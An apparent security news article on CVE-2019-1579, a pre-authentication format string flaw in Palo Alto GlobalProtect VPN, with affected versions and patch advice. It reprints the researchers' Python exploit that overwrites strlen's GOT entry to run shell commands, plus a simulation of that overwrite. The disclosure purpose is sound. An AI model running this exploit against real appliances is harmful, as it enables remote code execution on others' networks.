Palo Alto Networks has quietly fixed a critical vulnerability in GlobalProtect, the SSL VPN solution built into its PAN-OS firewalls.
Exploiting the vulnerability allows a remote attacker to execute arbitrary code. The flaw (CVE-2019-1579) is a format string bug affecting the GlobalProtect Portal and GlobalProtect Gateway interfaces; an unauthenticated attacker can trigger it by sending a specially crafted request to the device, so no valid credentials are required. Security researchers Orange Tsai and Meh Chang discovered the bug.
“We surveyed all Palo Alto SSL VPN over the world to see if there is any large corporation using the vulnerable GlobalProtect, and Uber is one of them!”, the researchers said.
Uber responded quickly and took the right step of patching the vulnerability.
Affected versions:
According to the researchers' survey, every GlobalProtect release from before July 2018 is vulnerable. The affected versions are:
- Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
- Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
- Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3
PoC code:
The researchers published PoC code demonstrating how the vulnerability is exploited.
#!/usr/bin/python
# Python 2 (pwntools' p32 returns str here); the "change me" values are target-specific.
import requests
from pwn import *

url = "https://sslvpn/sslmgr"          # target GlobalProtect portal/gateway
cmd = "echo pwned > /var/appweb/sslvpndocs/hacked.txt"  # command to run via system()

strlen_GOT = 0x667788 # change me: address of strlen's GOT entry in the sslmgr binary
system_plt = 0x445566 # change me: address of system@plt in the same binary

# Format string: overwrite strlen's 8-byte GOT entry with system_plt in three writes.
fmt =  '%70$n'                                       # counter is still 0: zero the upper 4 bytes
fmt += '%' + str((system_plt>>16)&0xff) + 'c'        # pad the counter up to byte 2 of system_plt
fmt += '%32$hn'                                      # write it as a short at GOT+2
fmt += '%' + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + 'c'  # pad up to the low 16 bits
fmt += '%24$hn'                                      # write them at GOT+0
for i in range(40,60):
    fmt += '%'+str(i)+'$p'                           # dump stack slots 40-59 as pointers

# These parameters carry the write targets; [:-1] drops the trailing NUL byte of
# each packed address so the request body is not truncated.
data  = "scep-profile-name="
data += p32(strlen_GOT)[:-1]
data += "&appauthcookie="
data += p32(strlen_GOT+2)[:-1]
data += "&host-id="
data += p32(strlen_GOT+4)[:-1]
data += "&user-email="
data += fmt                                          # the format string itself
data += "&appauthcookie="
data += cmd                                          # a later strlen() on this value now calls system(cmd)

r = requests.post(url, data=data)
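To make the arithmetic in the PoC's format string concrete, here is an added example (not the researchers' code) that rebuilds the write portion of the payload and runs it through a small printf interpreter against a mock 8-byte GOT slot. The slot numbers 24, 32 and 70 and the placeholder addresses are taken from the PoC above; that those slots hold the three address-bearing parameters in that order is an assumption of the simulation, as are the constructed original strlen address and the stack filler values. The example also rejects target addresses for which the PoC's padding arithmetic would not produce the intended value.

```python
import re

# Constructed values: the PoC's placeholder addresses and a made-up libc address
# standing in for the original contents of strlen's GOT entry.
STRLEN_GOT = 0x667788
SYSTEM_PLT = 0x445566
ORIGINAL_STRLEN = 0x7f3a12345678


def build_fmt(system_plt):
    """Build the PoC's format string for a given system@plt address.

    The PoC only works when the address fits in 24 bits (the %32$hn write carries
    a single byte in its low half) and when the two %c paddings are positive
    (a width of 0 or negative still prints at least one character), so reject
    anything else instead of producing a broken payload.
    """
    hi_byte = (system_plt >> 16) & 0xff   # byte 2 of the target address
    lo_word = system_plt & 0xffff         # bytes 0 and 1
    if system_plt >= 0x1000000 or not 1 <= hi_byte < lo_word:
        raise ValueError("PoC padding arithmetic cannot encode 0x%x" % system_plt)
    fmt = "%70$n"                                    # counter is 0: zero GOT+4..GOT+7
    fmt += "%" + str(hi_byte) + "c%32$hn"            # counter == hi_byte, written at GOT+2
    fmt += "%" + str(lo_word - hi_byte) + "c%24$hn"  # counter == lo_word, written at GOT+0
    for i in range(40, 60):
        fmt += "%" + str(i) + "$p"                   # stack dump, does not affect the writes
    return fmt


def simulate(fmt, stack, memory, base):
    """Interpret the subset of printf directives the PoC relies on.

    stack  : dict mapping a variadic slot number to the 64-bit value in that slot
    memory : bytearray mirroring len(memory) bytes of memory starting at address base
    Returns the number of characters a real printf would have emitted.
    """
    count = 0
    for m in re.finditer(r"%(\d+)(c|\$n|\$hn|\$p)", fmt):
        arg, kind = int(m.group(1)), m.group(2)
        if kind == "c":
            count += max(arg, 1)                     # %Nc pads to width N but emits >= 1 char
        elif kind == "$p":
            v = stack[arg]
            count += len("(nil)") if v == 0 else len(hex(v))  # glibc prints 0x... or (nil)
        else:                                        # %N$n / %N$hn: write counter via slot N
            size = 2 if kind == "$hn" else 4
            off = stack[arg] - base
            if not 0 <= off <= len(memory) - size:
                raise ValueError("write outside simulated memory at 0x%x" % stack[arg])
            mask = (1 << (8 * size)) - 1
            memory[off:off + size] = (count & mask).to_bytes(size, "little")
    return count


def hijack_strlen_got(system_plt=SYSTEM_PLT, strlen_got=STRLEN_GOT):
    """Run the PoC's write sequence against a mock GOT entry and return its new value."""
    got = bytearray(ORIGINAL_STRLEN.to_bytes(8, "little"))
    # Assumed layout matching the PoC: the three pointer-bearing parameters land in
    # variadic slots 24, 32 and 70; slots 40-59 hold arbitrary constructed stack words.
    stack = {24: strlen_got, 32: strlen_got + 2, 70: strlen_got + 4}
    stack.update({i: 0x1000 + i for i in range(40, 60)})
    simulate(build_fmt(system_plt), stack, got, strlen_got)
    return int.from_bytes(got, "little")


if __name__ == "__main__":
    print(hex(hijack_strlen_got()))
```

The three writes have to happen in the order the PoC uses them: the counter can only grow, so the zeroing %n must come first while it is still 0, the single-byte value at GOT+2 second, and the larger low word last.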
How to fix?
When the researchers reported the bug to Palo Alto Networks, however, they received the following reply:
“Thanks for the submission. Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know”, Palo Alto Networks replied.
So it seems the vulnerability was already known to Palo Alto Networks, but had not been disclosed to the public.
Administrators are urged to upgrade to PAN-OS 7.1.19 or later, 8.0.12 or later, or 8.1.3 or later, depending on the release branch in use.